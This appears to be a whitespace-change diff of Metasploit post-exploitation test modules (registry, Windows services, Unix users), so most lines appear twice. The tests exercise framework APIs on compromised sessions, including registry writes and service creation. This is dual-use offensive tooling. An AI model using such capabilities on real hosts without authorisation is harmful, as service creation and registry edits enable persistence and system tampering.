v_exists = registry_value_exist?(%q#HKCU\Environment#, "TEMP")
v_dne = registry_value_exist?(%q#HKLM\\Non\Existent\Key#, "asdf")
pending "should evaluate value existence" do
# these methods are not implemented
v_exists = registry_value_exist?(%q#HKCU\Environment#, "TEMP")
v_dne = registry_value_exist?(%q#HKLM\\Non\Existent\Key#, "asdf")
(v_exists && !v_dne)
end
(v_exists && !v_dne)
end
it "should read values" do
ret = true
valinfo = registry_getvalinfo(%q#HKCU\Environment#, "TEMP")
ret &&= !!(valinfo["Data"])
ret &&= !!(valinfo["Type"])
it "should read values" do
ret = true
valinfo = registry_getvalinfo(%q#HKCU\Environment#, "TEMP")
ret &&= !!(valinfo["Data"])
ret &&= !!(valinfo["Type"])
valdata = registry_getvaldata(%q#HKCU\Environment#, "TEMP")
ret &&= !!(valinfo["Data"] == valdata)
valdata = registry_getvaldata(%q#HKCU\Environment#, "TEMP")
ret &&= !!(valinfo["Data"] == valdata)
ret
end
ret
end
it "should return normalized values" do
ret = true
valinfo = registry_getvalinfo(%q#HKCU\Environment#, "TEMP")
if (valinfo.nil?)
ret = false
else
# type == 2 means string
ret &&= !!(valinfo["Type"] == 2)
ret &&= !!(valinfo["Data"].kind_of? String)
it "should return normalized values" do
ret = true
valinfo = registry_getvalinfo(%q#HKCU\Environment#, "TEMP")
if (valinfo.nil?)
ret = false
else
# type == 2 means string
ret &&= !!(valinfo["Type"] == 2)
ret &&= !!(valinfo["Data"].kind_of? String)
valinfo = registry_getvalinfo(%q#HKLM\Software\Microsoft\Active Setup#, "DisableRepair")
if (valinfo.nil?)
ret = false
else
# type == 4 means DWORD
ret &&= !!(valinfo["Type"] == 4)
ret &&= !!(valinfo["Data"].kind_of? Numeric)
end
end
valinfo = registry_getvalinfo(%q#HKLM\Software\Microsoft\Active Setup#, "DisableRepair")
if (valinfo.nil?)
ret = false
else
# type == 4 means DWORD
ret &&= !!(valinfo["Type"] == 4)
ret &&= !!(valinfo["Data"].kind_of? Numeric)
end
end
ret
end
ret
end
it "should enumerate keys and values" do
ret = true
# Has no keys, should return an empty Array
keys = registry_enumkeys(%q#HKCU\Environment#)
ret &&= (keys.kind_of? Array)
it "should enumerate keys and values" do
ret = true
# Has no keys, should return an empty Array
keys = registry_enumkeys(%q#HKCU\Environment#)
ret &&= (keys.kind_of? Array)
vals = registry_enumvals(%q#HKCU\Environment#)
ret &&= (vals.kind_of? Array)
ret &&= (vals.count > 0)
ret &&= (vals.include? "TEMP")
vals = registry_enumvals(%q#HKCU\Environment#)
ret &&= (vals.kind_of? Array)
ret &&= (vals.count > 0)
ret &&= (vals.include? "TEMP")
ret
end
ret
end
end
end
def test_1_registry_write
it "should create keys" do
ret = registry_createkey(%q#HKCU\test_key#)
end
def test_1_registry_write
it "should create keys" do
ret = registry_createkey(%q#HKCU\test_key#)
end
it "should write REG_SZ values" do
ret = true
registry_setvaldata(%q#HKCU\test_key#, "test_val_str", "str!", "REG_SZ")
registry_setvaldata(%q#HKCU\test_key#, "test_val_dword", 1234, "REG_DWORD")
valinfo = registry_getvalinfo(%q#HKCU\test_key#, "test_val_str")
if (valinfo.nil?)
ret = false
else
# type == REG_SZ means string
ret &&= !!(valinfo["Type"] == 1)
ret &&= !!(valinfo["Data"].kind_of? String)
ret &&= !!(valinfo["Data"] == "str!")
end
it "should write REG_SZ values" do
ret = true
registry_setvaldata(%q#HKCU\test_key#, "test_val_str", "str!", "REG_SZ")
registry_setvaldata(%q#HKCU\test_key#, "test_val_dword", 1234, "REG_DWORD")
valinfo = registry_getvalinfo(%q#HKCU\test_key#, "test_val_str")
if (valinfo.nil?)
ret = false
else
# type == REG_SZ means string
ret &&= !!(valinfo["Type"] == 1)
ret &&= !!(valinfo["Data"].kind_of? String)
ret &&= !!(valinfo["Data"] == "str!")
end
ret
end
ret
end
it "should write REG_DWORD values" do
ret = true
registry_setvaldata(%q#HKCU\test_key#, "test_val_dword", 1234, "REG_DWORD")
valinfo = registry_getvalinfo(%q#HKCU\test_key#, "test_val_dword")
if (valinfo.nil?)
ret = false
else
ret &&= !!(valinfo["Type"] == 4)
ret &&= !!(valinfo["Data"].kind_of? Numeric)
ret &&= !!(valinfo["Data"] == 1234)
end
ret
end
it "should write REG_DWORD values" do
ret = true
registry_setvaldata(%q#HKCU\test_key#, "test_val_dword", 1234, "REG_DWORD")
valinfo = registry_getvalinfo(%q#HKCU\test_key#, "test_val_dword")
if (valinfo.nil?)
ret = false
else
ret &&= !!(valinfo["Type"] == 4)
ret &&= !!(valinfo["Data"].kind_of? Numeric)
ret &&= !!(valinfo["Data"] == 1234)
end
ret
end
it "should delete keys" do
ret = registry_deleteval(%q#HKCU\test_key#, "test_val_str")
valinfo = registry_getvalinfo(%q#HKCU\test_key#, "test_val_str")
# getvalinfo should return nil for a non-existent key
ret &&= (valinfo.nil?)
ret &&= registry_deletekey(%q#HKCU\test_key#)
# Deleting the key should delete all its values
valinfo = registry_getvalinfo(%q#HKCU\test_key#, "test_val_dword")
ret &&= (valinfo.nil?)
it "should delete keys" do
ret = registry_deleteval(%q#HKCU\test_key#, "test_val_str")
valinfo = registry_getvalinfo(%q#HKCU\test_key#, "test_val_str")
# getvalinfo should return nil for a non-existent key
ret &&= (valinfo.nil?)
ret &&= registry_deletekey(%q#HKCU\test_key#)
# Deleting the key should delete all its values
valinfo = registry_getvalinfo(%q#HKCU\test_key#, "test_val_dword")
ret &&= (valinfo.nil?)
ret
end
ret
end
end
end
end
test/modules/post/test/services.rb
+142 -142
View File
@@ -11,176 +11,176 @@ require 'module_test'
class Metasploit3 < Msf::Post
include Msf::Post::Windows::Services
include Msf::Post::Windows::Services
include Msf::ModuleTest::PostTest
include Msf::ModuleTest::PostTest
def initialize(info={})
super( update_info( info,
'Name' => 'Test Post::Windows::Services',
'Description' => %q{ This module will test windows services methods within a shell},
'License' => MSF_LICENSE,
'Author' => [ 'kernelsmith', 'egypt' ],
'Version' => '$Revision: 11663 $',
'Platform' => [ 'windows' ],
'SessionTypes' => [ 'meterpreter', 'shell' ]
))
register_options(
[
OptString.new("QSERVICE" , [true, "Service (keyname) to query", "winmgmt"]),
OptString.new("NSERVICE" , [true, "New Service (keyname) to create/del", "testes"]),
OptString.new("SSERVICE" , [true, "Service (keyname) to start/stop", "W32Time"]),
OptString.new("DNAME" , [true, "Display name used for create test", "Cool display name"]),
OptString.new("BINPATH" , [true, "Binary path for create test", "C:\\WINDOWS\\system32\\svchost.exe -k netsvcs"]),
OptEnum.new("MODE", [true, "Mode to use for startup/create tests", "auto",
["auto", "manual", "disable"]
]),
], self.class)
def initialize(info={})
super( update_info( info,
'Name' => 'Test Post::Windows::Services',
'Description' => %q{ This module will test windows services methods within a shell},
'License' => MSF_LICENSE,
'Author' => [ 'kernelsmith', 'egypt' ],
'Version' => '$Revision: 11663 $',
'Platform' => [ 'windows' ],
'SessionTypes' => [ 'meterpreter', 'shell' ]
))
register_options(
[
OptString.new("QSERVICE" , [true, "Service (keyname) to query", "winmgmt"]),
OptString.new("NSERVICE" , [true, "New Service (keyname) to create/del", "testes"]),
OptString.new("SSERVICE" , [true, "Service (keyname) to start/stop", "W32Time"]),
OptString.new("DNAME" , [true, "Display name used for create test", "Cool display name"]),
OptString.new("BINPATH" , [true, "Binary path for create test", "C:\\WINDOWS\\system32\\svchost.exe -k netsvcs"]),
OptEnum.new("MODE", [true, "Mode to use for startup/create tests", "auto",
["auto", "manual", "disable"]
]),
], self.class)
end
end
def test_start
it "should start #{datastore["SSERVICE"]}" do
ret = true
results = service_start(datastore['SSERVICE'])
if results != 0
# Failed the first time, try to stop it first, then try again
service_stop(datastore['SSERVICE'])
results = service_start(datastore['SSERVICE'])
end
ret &&= (results == 0)
def test_start
it "should start #{datastore["SSERVICE"]}" do
ret = true
results = service_start(datastore['SSERVICE'])
if results != 0
# Failed the first time, try to stop it first, then try again
service_stop(datastore['SSERVICE'])
results = service_start(datastore['SSERVICE'])
end
ret &&= (results == 0)
ret
end
it "should stop #{datastore["SSERVICE"]}" do
ret = true
results = service_stop(datastore['SSERVICE'])
ret &&= (results == 0)
ret
end
it "should stop #{datastore["SSERVICE"]}" do
ret = true
results = service_stop(datastore['SSERVICE'])
ret &&= (results == 0)
ret
end
end
ret
end
end
def test_list
it "should list services" do
ret = true
results = service_list
def test_list
it "should list services" do
ret = true
results = service_list
ret &&= results.kind_of? Array
ret &&= results.length > 0
ret &&= results.include? datastore["QSERVICE"]
ret &&= results.kind_of? Array
ret &&= results.length > 0
ret &&= results.include? datastore["QSERVICE"]
ret
end
end
ret
end
end
def test_info
it "should return info on a given service" do
ret = true
results = service_info(datastore['QSERVICE'])
def test_info
it "should return info on a given service" do
ret = true
results = service_info(datastore['QSERVICE'])
ret &&= results.kind_of? Hash
if ret
ret &&= results.has_key? "Name"
ret &&= (results["Name"] == "Windows Management Instrumentation")
ret &&= results.has_key? "Startup"
ret &&= results.has_key? "Command"
ret &&= results.has_key? "Credentials"
end
ret &&= results.kind_of? Hash
if ret
ret &&= results.has_key? "Name"
ret &&= (results["Name"] == "Windows Management Instrumentation")
ret &&= results.has_key? "Startup"
ret &&= results.has_key? "Command"
ret &&= results.has_key? "Credentials"
end
ret
end
end
ret
end
end
def test_create
it "should create a service" do
mode = case datastore["MODE"]
when "disable"; 4
when "manual"; 3
when "auto"; 2
else; 2
end
ret = service_create(datastore['NSERVICE'],datastore['DNAME'],datastore['BINPATH'],mode)
def test_create
it "should create a service" do
mode = case datastore["MODE"]
when "disable"; 4
when "manual"; 3
when "auto"; 2
else; 2
end
ret = service_create(datastore['NSERVICE'],datastore['DNAME'],datastore['BINPATH'],mode)
ret
end
ret
end
it "should return info on the newly-created service" do
ret = true
results = service_info(datastore['NSERVICE'])
it "should return info on the newly-created service" do
ret = true
results = service_info(datastore['NSERVICE'])
ret &&= results.kind_of? Hash
ret &&= results.has_key? "Name"
ret &&= (results["Name"] == datastore["DNAME"])
ret &&= results.has_key? "Startup"
ret &&= (results["Startup"].downcase == datastore["MODE"])
ret &&= results.has_key? "Command"
ret &&= results.has_key? "Credentials"
ret &&= results.kind_of? Hash
ret &&= results.has_key? "Name"
ret &&= (results["Name"] == datastore["DNAME"])
ret &&= results.has_key? "Startup"
ret &&= (results["Startup"].downcase == datastore["MODE"])
ret &&= results.has_key? "Command"
ret &&= results.has_key? "Credentials"
ret
end
ret
end
it "should delete the new service" do
ret = service_delete(datastore['NSERVICE'])
it "should delete the new service" do
ret = service_delete(datastore['NSERVICE'])
ret
end
end
ret
end
end
=begin
def run
blab = datastore['VERBOSE']
print_status("Running against session #{datastore["SESSION"]}")
print_status("Session type is #{session.type}")
print_status("Verbosity is set to #{blab.to_s}")
print_status("Don't be surprised to see some errors as the script is faster")
print_line("than the windows SCM, just make sure the errors are sane. You can")
print_line("set VERBOSE to true to see more details")
def run
blab = datastore['VERBOSE']
print_status("Running against session #{datastore["SESSION"]}")
print_status("Session type is #{session.type}")
print_status("Verbosity is set to #{blab.to_s}")
print_status("Don't be surprised to see some errors as the script is faster")
print_line("than the windows SCM, just make sure the errors are sane. You can")
print_line("set VERBOSE to true to see more details")
print_status()
print_status("TESTING service_query_ex on servicename: #{datastore["QSERVICE"]}")
results = service_query_ex(datastore['QSERVICE'])
print_status("RESULTS: #{results.class} #{results.pretty_inspect}")
print_status()
print_status("TESTING service_query_ex on servicename: #{datastore["QSERVICE"]}")
results = service_query_ex(datastore['QSERVICE'])
print_status("RESULTS: #{results.class} #{results.pretty_inspect}")
print_status()
print_status("TESTING service_query_config on servicename: #{datastore["QSERVICE"]}")
results = service_query_config(datastore['QSERVICE'])
print_status("RESULTS: #{results.class} #{results.pretty_inspect}")
print_status()
print_status("TESTING service_query_config on servicename: #{datastore["QSERVICE"]}")
results = service_query_config(datastore['QSERVICE'])
print_status("RESULTS: #{results.class} #{results.pretty_inspect}")
print_status()
print_status("TESTING service_change_startup on servicename: #{datastore['QSERVICE']} " +
"to #{datastore['MODE']}")
results = service_change_startup(datastore['QSERVICE'],datastore['MODE'])
print_status("RESULTS: #{results.class} #{results.pretty_inspect}")
print_status("Current status of this service " +
"#{service_query_ex(datastore['QSERVICE']).pretty_inspect}") if blab
print_status()
print_status("TESTING service_change_startup on servicename: #{datastore['QSERVICE']} " +
"to #{datastore['MODE']}")
results = service_change_startup(datastore['QSERVICE'],datastore['MODE'])
print_status("RESULTS: #{results.class} #{results.pretty_inspect}")
print_status("Current status of this service " +
"#{service_query_ex(datastore['QSERVICE']).pretty_inspect}") if blab
print_status()
print_status("TESTING service_start on servicename: #{datastore['SSERVICE']}")
results = service_start(datastore['SSERVICE'])
print_status("RESULTS: #{results.class} #{results.pretty_inspect}")
print_status("Current status of this service " +
"#{service_query_ex(datastore['SSERVICE']).pretty_inspect}") if blab
print_status("Sleeping to give the service a chance to start")
select(nil, nil, nil, 2) # give the service time to start, reduces false negatives
print_status()
print_status("TESTING service_start on servicename: #{datastore['SSERVICE']}")
results = service_start(datastore['SSERVICE'])
print_status("RESULTS: #{results.class} #{results.pretty_inspect}")
print_status("Current status of this service " +
"#{service_query_ex(datastore['SSERVICE']).pretty_inspect}") if blab
print_status("Sleeping to give the service a chance to start")
select(nil, nil, nil, 2) # give the service time to start, reduces false negatives
print_status()
print_status("TESTING service_stop on servicename: #{datastore['SSERVICE']}")
results = service_stop(datastore['SSERVICE'])
print_status("RESULTS: #{results.class} #{results.pretty_inspect}")
print_status("Current status of this service " +
"#{service_query_ex(datastore['SSERVICE']).pretty_inspect}") if blab
print_status()
print_status("TESTING service_stop on servicename: #{datastore['SSERVICE']}")
results = service_stop(datastore['SSERVICE'])
print_status("RESULTS: #{results.class} #{results.pretty_inspect}")
print_status("Current status of this service " +
"#{service_query_ex(datastore['SSERVICE']).pretty_inspect}") if blab
print_status()
print_status("TESTING service_delete on servicename: #{datastore['NSERVICE']}")
results = service_delete(datastore['NSERVICE'])
print_status("RESULTS: #{results.class} #{results.pretty_inspect}")
print_status("Current status of this service " +
"#{service_query_ex(datastore['QSERVICE']).pretty_inspect}") if blab
print_status()
print_status("Testing complete.")
end
print_status()
print_status("TESTING service_delete on servicename: #{datastore['NSERVICE']}")
results = service_delete(datastore['NSERVICE'])
print_status("RESULTS: #{results.class} #{results.pretty_inspect}")
print_status("Current status of this service " +
"#{service_query_ex(datastore['QSERVICE']).pretty_inspect}") if blab
print_status()
print_status("Testing complete.")
end
=end
end
test/modules/post/test/unix.rb
+32 -32
View File
@@ -9,42 +9,42 @@ require 'module_test'
class Metasploit4 < Msf::Post
include Msf::ModuleTest::PostTest
include Msf::Post::Linux::System
include Msf::Post::Unix
include Msf::Post::Common
include Msf::ModuleTest::PostTest
include Msf::Post::Linux::System
include Msf::Post::Unix
include Msf::Post::Common
def initialize(info={})
super( update_info( info,
'Name' => 'Testing Remote Unix System Manipulation',
'Description' => %q{ This module will test Post::File API methods },
'License' => MSF_LICENSE,
'Author' => [ 'egypt'],
'Platform' => [ 'linux', 'java' ],
'SessionTypes' => [ 'meterpreter', 'shell' ]
))
end
def initialize(info={})
super( update_info( info,
'Name' => 'Testing Remote Unix System Manipulation',
'Description' => %q{ This module will test Post::File API methods },
'License' => MSF_LICENSE,
'Author' => [ 'egypt'],
'Platform' => [ 'linux', 'java' ],
'SessionTypes' => [ 'meterpreter', 'shell' ]
))
end
def test_unix
it "should list users" do
ret = true
users = get_users
ret &&= users.kind_of? Array
ret &&= users.length > 0
have_root = false
if ret
users.each { |u|
next unless u[:name] == "root"
have_root = true
}
end
ret
ret &&= have_root
def test_unix
it "should list users" do
ret = true
users = get_users
ret &&= users.kind_of? Array
ret &&= users.length > 0
have_root = false
if ret
users.each { |u|
next unless u[:name] == "root"
have_root = true
}
end
ret
ret &&= have_root
ret
end
ret
end
end
end
end